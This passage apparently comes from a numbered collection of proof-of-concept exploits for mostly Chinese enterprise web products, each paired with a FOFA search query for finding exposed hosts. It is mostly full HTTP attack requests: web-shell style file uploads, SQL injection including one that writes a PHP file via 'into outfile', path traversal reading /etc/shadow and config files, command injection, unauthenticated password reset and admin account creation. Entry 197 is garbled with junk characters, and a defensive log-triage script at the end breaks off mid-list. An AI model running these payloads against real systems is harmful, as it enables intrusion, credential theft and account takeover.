Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--


164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--


http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))


166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE


167. 精益价值管理系统 (lean value management system) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


168. 宏景EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close


169. 宏景EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close


170. 宏景EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close


172. DT HD license plate recognition camera arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive


173. Check Point security gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow


174. 金和OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close


175. 金和OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1


176. Telecom gateway configuration management system rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--


177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg


178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--


GET /imc/primepush/%2e%2e/flex/12234.txt


179. 建文 engineering management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=


180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close


181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20


182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1


183. 广州图创 Interlib library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host


186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation systems.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会视频会议 (video conferencing) attachment arbitrary file read
version <= 3.9.7
FOFA: body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技 (LANWON) clinical viewing system deleteStudy SQL injection
FOFA: app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

The stacked WAITFOR DELAY is a Microsoft SQL Server time-based check; a five-second delay in the response confirms the injection.

190. 短视频矩阵营销系统 (short-video matrix marketing system) poihuoqu arbitrary file read
FOFA: title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通 electronic document security management system NavigationAjax SQL injection
FOFA: body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP (foreign-trade ERP) UploadEmailAttr arbitrary file upload
FOFA: title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<%@ WebHandler Language="C#" Class="AverageHandler" %>
using System;
using System.Web;

public class AverageHandler : IHttpHandler
{
    public bool IsReusable { get { return true; } }

    public void ProcessRequest(HttpContext ctx)
    {
        ctx.Response.Write("test");
    }
}

The request body is stored as-is and the name parameter supplies the extension, so a successful upload leaves an .ashx handler on the server that answers "test" when requested.

193. 山石网科云鉴 (Hillstone) security management system setSystemTimeAction command execution
FOFA: body="山石云鉴主机安全管理系统"
Step 1: fetch a CSRF token for a PHPSESSID of your choosing.
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

Step 2: submit the command with the same session cookie; {{token}} is the value returned by step 1.
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')

Step 3: if the command ran, the echoed marker is served back from the web root.
GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 (FE enterprise operations platform) uploadAttachmentServlet arbitrary file upload
FOFA: app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet gets a response, the endpoint is exposed and the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

The filename traverses out of the attachment directory into the deployed fe.war, where the application serves the JSP.

195. 飞鱼星上网行为管理系统 (internet behavior management system) send_order.cgi command execution
FOFA: title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技 unified authentication platform password reset
FOFA: body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

xgh identifies the target account and newPass is the password it is set to; the request carries no session, so any account name that exists can be taken over.

197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入2 b5 L$ D) F5 _+ t7 j6 s6 d
FOFA:app="浙大恩特客户资源管理系统"
( Y& P* D' V9 Z( B6 d. wGET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
& ~+ g) i# [, C- z8 b, wHost:
7 b, Q3 x& M) Y( k/ l3 w  L* vUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
2 S; d& B2 x" b: q% d% GAccept-Encoding: gzip, deflate/ n8 S, A1 d4 J/ [" ~% G- o0 V
Connection: close
+ Q/ G& p4 X  L) J5 T' q2 e$ W8 _/ u( ?  \, o) Y
' R# [' `8 Q8 ]" c! H' n1 @, m
% m' A+ T5 S, r- O0 \7 t2 s" @
198. 阿里云盘 (Aliyundrive) WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

The sid value decodes to `ls />/www/aaa.txt` in backticks, so the directory listing lands in /www/aaa.txt. The request carries a LuCI sysauth cookie, so this is an authenticated injection.

199. Cockpit assetsmanager/upload endpoint file upload
FOFA: title="Authenticate Please!"

Step 1: request the login page to obtain the CSRF token:
GET /auth/login?to=/ HTTP/1.1

Response: 200, the body contains csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

Step 2: use the JWT from step 1 to log in and obtain a session cookie (the PoC logs in as admin/admin):
POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, with:
Set-Cookie: mysession=95524f01e238bf51bb60d77ede3bea92; path=/

Step 3: upload with the session cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"

-----------------------------36D28FBc36bd6feE7Fb3--

The uploaded file is then reachable at:
/storage/uploads/tttt.php

200. SeaCMS (海洋影视管理系统) dmku SQL injection
FOFA: app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正 (Founder) all-media news editing system binary SQL injection
FOFA: body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎 system AccountEdit arbitrary file upload
FOFA: body="/Widgets/WidgetCollection/"
Step 1: fetch the page to obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Step 2: replace __VIEWSTATE and __EVENTVALIDATION below with the fetched values and submit the upload:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

The uploaded file is then reachable at:
/_data/Uploads/1123.txt

203. 红海云 (Redsea) EHR PtFjk file upload
FOFA: body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--

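The post is meant for defenders doing risk triage, so here is a log triage script for the requests in this section. It is an added example, not code from the original post or from any of the vendors named above: it parses combined-format access-log lines, URL-decodes the request target, matches it against the endpoints and payload fragments of entries 185 to 203, and for the entry 185 pattern decodes the unhex() payload to show which file the query writes. Only the paths and query fragments are taken from the requests above; the log format, the severity labels and the sample lines (constructed, not captured) are assumptions of this example.

```python
"""Triage combined-format access-log lines against the requests in this section.
Added example for defenders, not code from the original post; SAMPLE_LOG is
constructed, not captured traffic."""
import re
from urllib.parse import unquote_plus

# Apache/nginx combined format: client, ident, user, [time], "METHOD target proto", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# (entry number above, regex over the URL-decoded "METHOD target" string).
# Paths and query fragments come from the published requests only.
SIGNATURES = [
    ("185", r"/Admin/appsave\b.*\binto outfile\b"),
    ("186", r"/admin/pr_monitor/getting_index_data\.php"),
    ("187", r"method=processAsyncObject"),
    ("188", r"^GET /attachment\?file=/"),
    ("189", r"/xds/deleteStudy\.php\?documentUniqueId=.*waitfor"),
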